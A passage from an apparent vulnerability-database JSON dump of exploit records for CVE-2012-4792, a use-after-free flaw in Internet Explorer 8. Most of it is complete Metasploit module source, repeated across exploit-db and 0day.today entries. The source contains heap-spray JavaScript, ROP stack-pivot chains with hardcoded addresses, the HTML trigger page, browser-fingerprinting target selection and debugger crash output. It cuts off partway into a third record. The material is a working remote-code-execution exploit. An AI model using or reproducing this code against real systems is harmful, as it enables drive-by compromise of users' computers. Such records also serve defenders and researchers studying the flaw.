IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 
7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23785/"}, {"lastseen": "2016-02-02T21:44:07", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability. CVE-2012-4792. Remote exploit for windows platform", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "EDB-ID:23754", "href": "https://www.exploit-db.com/exploits/23754/", "type": "exploitdb", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n\t\t\t\tuse-after-free condition occurs when a CDwnBindInfo object is freed by\r\n\t\t\t\tFollowHyperlink2, but a reference is kept in CDoc. 
As a result, when the reference\r\n\t\t\t\tis used again during a page reload, an invalid memory that's controllable is used,\r\n\t\t\t\tand allows arbitrary code execution under the context of the user.\r\n\r\n\t\t\t\t\tPlease note: This vulnerability has been exploited in the wild targeting\r\n\t\t\t\tmainly China/Taiwan/and US-based computers.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'eromang',\r\n\t\t\t\t\t'mahmud ab rahman',\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4792' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '154201' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n\t\t\t\t\t[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 980,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 
0x0c0c0b30\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Dec 27 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen '5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '5.2'\r\n\t\t\tos_name = 'Windows Server 2003'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\telse\r\n\t\t\t# OS not supported\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name))\r\n\t\t\t\tprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef ie_heap_spray(my_target, p)\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Land the payload at 0x0c0c0b30\r\n\t\tjs = %Q|\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape(\"#{js_code}\");\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\t\tvar offset = nops.substring(0, #{my_target['Offset']});\r\n\t\tvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\t\theap_obj.gc();\r\n\t\tfor (var i=1; i < 0x300; i++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\t\tvar overflow = nops.substring(0, 10);\r\n\t\t|\r\n\r\n\t\tjs = heaplib(js, {:noobfu => true})\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\treturn js\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. 
Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n=begin\r\nStack Pivoting to eax:\r\n0:008> db eax\r\n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n=end\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\t\tif t['Name'] =~ /Windows XP/\r\n\t\t\t\tstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret\r\n\t\t\t\tstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret\r\n\t\t\t\tstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n\t\t\telse\r\n\t\t\t\tstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret\r\n\t\t\t\tstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret\r\n\t\t\t\tstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"Using JRE ROP\")\r\n\t\t\tstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret\r\n\t\t\tstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret\r\n\t\t\tstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\trop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n\t\tend\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\tdef load_exploit_html(my_target, cli)\r\n\r\n\t\tp = get_payload(my_target, cli)\r\n\t\tjs = ie_heap_spray(my_target, p)\r\n\r\n\t\thtml = %Q|\r\n\t\t<!doctype html>\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js}\r\n\r\n\t\tfunction exploit()\r\n\t\t{\r\n\t\t\tvar e0 = null;\r\n\t\t\tvar e1 = null;\r\n\t\t\tvar e2 = null;\r\n\t\t\tvar arrObject = new Array(3000);\r\n\t\t\tvar elmObject = new Array(500);\r\n\t\t\tfor (var i = 0; i < arrObject.length; 
i++)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i] = document.createElement('div');\r\n\t\t\t\tarrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n\t\t\t}\r\n\r\n\t\t\tfor (var i = 0; i < arrObject.length; i += 2)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = null;\r\n\t\t\t}\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tfor (var i = 0; i < elmObject.length; i ++)\r\n\t\t\t{\r\n\t\t\t\telmObject[i] = document.createElement('button');\r\n\t\t\t}\r\n\r\n\t\t\tfor (var i = 1; i < arrObject.length; i += 2)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = null;\r\n\t\t\t}\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\ttry {\r\n\t\t\t\te0 = document.getElementById(\"a\");\r\n\t\t\t\te1 = document.getElementById(\"b\");\r\n\t\t\t\te2 = document.createElement(\"q\");\r\n\t\t\t\te1.applyElement(e2);\r\n\t\t\t\te1.appendChild(document.createElement('button'));\r\n\t\t\t\te1.applyElement(e0);\r\n\t\t\t\te2.outerText = \"\";\r\n\t\t\t\te2.appendChild(document.createElement('body'));\r\n\t\t\t} catch(e) { }\r\n\t\t\tCollectGarbage();\r\n\t\t\tfor(var i =0; i < 20; i++)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n\t\t\t}\r\n\t\t\tvar eip = window;\r\n\t\t\tvar data = \"https://www.google.com/settings/account\";\r\n\t\t\teip.location = unescape(\"%u0b30%u0c0c\" + data);\r\n\r\n\t\t}\r\n\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"eval(exploit())\">\r\n\t\t<form id=\"a\">\r\n\t\t</form>\r\n\t\t<dfn id=\"b\">\r\n\t\t</dfn>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\turi = request.uri\r\n\t\tprint_status(\"Requesting: #{uri}\")\r\n\r\n\t\tmy_target = get_target(agent)\r\n\t\t# Avoid the attack if no suitable target found\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending 404: 
#{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = load_exploit_html(my_target, cli)\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\t\tprint_status(\"Sending HTML...\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] 
ds:0023:0c0c0ce8=????????\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23754/"}], "zdt": [{"lastseen": "2018-01-10T17:26:01", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "1337DAY-ID-20069", "href": "https://0day.today/exploit/description/20069", "type": "zdt", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. 
A\r\n use-after-free condition occurs when a CButton object is freed, but a reference\r\n is kept and used again during a page reload, an invalid memory that's controllable\r\n is used, and allows arbitrary code execution under the context of the user.\r\n\r\n Please note: This vulnerability has been exploited in the wild targeting\r\n mainly China/Taiwan/and US-based computers.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'eromang',\r\n 'mahmud ab rahman',\r\n 'juan vazquez',\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-4792' ],\r\n [ 'US-CERT-VU', '154201' ],\r\n [ 'BID', '57070' ],\r\n [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 980,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Dec 27 2012\",\r\n 
'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '5.2'\r\n os_name = 'Windows Server 2003'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n else\r\n # OS not supported\r\n return nil\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))\r\n\r\n # Land the payload at 0x0c0c0b30\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n # No rop. 
Just return the payload.\r\n return code if t['Rop'].nil?\r\n\r\n=begin\r\nStack Pivoting to eax:\r\n0:008> db eax\r\n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n=end\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n if t.name =~ /Windows XP/\r\n stack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n else\r\n stack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})\r\n end\r\n else\r\n print_status(\"Using JRE ROP\")\r\n stack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n end\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n\r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n\r\n function exploit()\r\n {\r\n var e0 = null;\r\n var e1 = null;\r\n var e2 = null;\r\n var arrObject = new Array(3000);\r\n var elmObject = new Array(500);\r\n for (var i = 0; i < arrObject.length; i++)\r\n {\r\n arrObject[i] = document.createElement('div');\r\n arrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n }\r\n\r\n for (var i = 0; i < 
arrObject.length; i += 2)\r\n {\r\n arrObject[i].className = null;\r\n }\r\n\r\n CollectGarbage();\r\n\r\n for (var i = 0; i < elmObject.length; i ++)\r\n {\r\n elmObject[i] = document.createElement('button');\r\n }\r\n\r\n for (var i = 1; i < arrObject.length; i += 2)\r\n {\r\n arrObject[i].className = null;\r\n }\r\n\r\n CollectGarbage();\r\n\r\n try {\r\n e0 = document.getElementById(\"a\");\r\n e1 = document.getElementById(\"b\");\r\n e2 = document.createElement(\"q\");\r\n e1.applyElement(e2);\r\n e1.appendChild(document.createElement('button'));\r\n e1.applyElement(e0);\r\n e2.outerText = \"\";\r\n e2.appendChild(document.createElement('body'));\r\n } catch(e) { }\r\n CollectGarbage();\r\n for(var i =0; i < 20; i++)\r\n {\r\n arrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n }\r\n var eip = window;\r\n var data = \"#{Rex::Text.rand_text_alpha(41)}\";\r\n eip.location = unescape(\"%u0b30%u0c0c\" + data);\r\n\r\n }\r\n\r\n </script>\r\n </head>\r\n <body onload=\"eval(exploit())\">\r\n <form id=\"a\">\r\n </form>\r\n <dfn id=\"b\">\r\n </dfn>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 
edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n\r\n=end\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20069"}], "metasploit": [{"lastseen": "2019-10-22T01:42:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. 
A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.\n", "modified": "2017-07-24T13:26:21", "published": "2012-12-31T06:29:19", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF", "href": "", "type": "metasploit", "title": "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"8.0\",\n # :ua_maxver => \"8.0\",\n # :javascript => true,\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => GoodRanking\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. 
